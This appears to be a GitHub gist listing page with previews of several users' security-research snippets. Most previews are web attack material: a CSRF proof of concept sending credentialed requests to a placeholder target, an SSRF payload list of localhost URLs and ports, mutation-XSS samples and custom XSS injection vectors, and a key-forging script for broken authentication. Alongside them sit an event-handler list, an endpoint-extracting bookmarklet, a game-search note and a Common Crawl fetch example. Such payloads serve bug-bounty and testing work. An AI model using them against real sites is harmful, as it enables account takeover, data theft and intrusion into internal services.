Skip to content

Instantly share code, notes, and snippets.

View electro0nes's full-sized avatar
🏠
Working from home

Moein Erfanian electro0nes

🏠
Working from home
View GitHub Profile
@omidxrz
omidxrz / eventhandler.txt
Last active June 1, 2026 16:20
eventhandler.txt
onsearch
onappinstalled
onbeforeinstallprompt
onbeforexrselect
onabort
onbeforeinput
onbeforematch
onbeforetoggle
onblur
oncancel
@JorianWoltjer
JorianWoltjer / csrf_multiple_forms.html
Last active August 31, 2025 11:52
PoC's for CSRF multiple SameSite=Lax requests (https://x.com/J0R1AN/status/1842139861295169836)
<body></body>
<script>
(async () => {
const target = "https://XXX.ngrok-free.app";
// Warmup
await fetch(target, {
mode: "no-cors",
credentials: "include",
});
javascript: (function() {
var scripts = document.getElementsByTagName("script"),
regex = /(?<=(\"|\%27|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\%60))/g;
const results = new Set;
for (var i = 0; i < scripts.length; i++) {
var t = scripts[i].src;
"" != t && fetch(t).then(function(t) {
return t.text()
}).then(function(t) {
var e = t.matchAll(regex);
@jhaddix
jhaddix / d4dorks.txt
Last active December 6, 2025 22:34
Diablo 4 Dorks
Search groups explained:
Group 1 "exploit, farm, glitch, cheese, AFK, multibox, dupe, grind" - This search will keep you up to date on "clever use of game mechanics" should you want to be on the bleeding edge.
Group 2 "build OR guide OR nerf" - This wil keep you up to date with classes and builds coming out and ones that are over powered.
Group 3: "unique OR set OR legendary OR gold OR murmuring OR veiled" - will keep you up to date on the currency and gear grind meta.
SEARCH LINKS:
@omidxrz
omidxrz / BroknAuth.py
Created January 13, 2023 11:58
BroknAuth
import base64
import hashlib
# Userid = "2"
# User = "yasho"
# Key = "dddf24b2a3f560f3d5ce805b80492e62"
Userid = "47"
User = "administrador"
Key = "dddf24b2a3f560f3d5ce805b80492e62"
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://127.1:80
http://0
http://0.0.0.0:80
http://localhost:80
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:3128/ Squid
@fransr
fransr / logger.js
Last active December 18, 2025 10:06
logger.js for hunting script gadgets. More info about script gadgets: https://github.com/google/security-research-pocs/tree/master/script-gadgets (Sebastian Lekies / Eduardo Vela Nava / Krzysztof Kotowicz)
var logger = console.trace;
// ELEMENT
;(getElementByIdCopy => {
Element.prototype.getElementById = function(q) {
logger('getElementById', q, this, this.innerHTML);
return Reflect.apply(getElementByIdCopy, this, [q])
}
})(Element.prototype.getElementById)
@irsdl
irsdl / mXSS
Last active June 7, 2026 12:22
some mXSS samples
<img alt="<x" title="/><img src=url404 onerror=xss(0)>">
<img alt="
<x" title="/>
<img src=url404 onerror=xss(1)>">
<style><style/><img src=url404 onerror=xss(2)>
<xmp><xmp/><img src=url404 onerror=xss(3)>

Custom XSS Vectors

"><img src=x onerror=prompt(1);>

+123'];alert(1);[['

123',alert(1),'

123\",term:alert(1)//\"
@Smerity
Smerity / fetch_page.py
Created August 7, 2015 21:30
An example of fetching a page from Common Crawl using the Common Crawl Index
import gzip
import json
import requests
try:
from cStringIO import StringIO
except:
from StringIO import StringIO
# Let's fetch the Common Crawl FAQ using the CC index
resp = requests.get('http://index.commoncrawl.org/CC-MAIN-2015-27-index?url=http%3A%2F%2Fcommoncrawl.org%2Ffaqs%2F&output=json')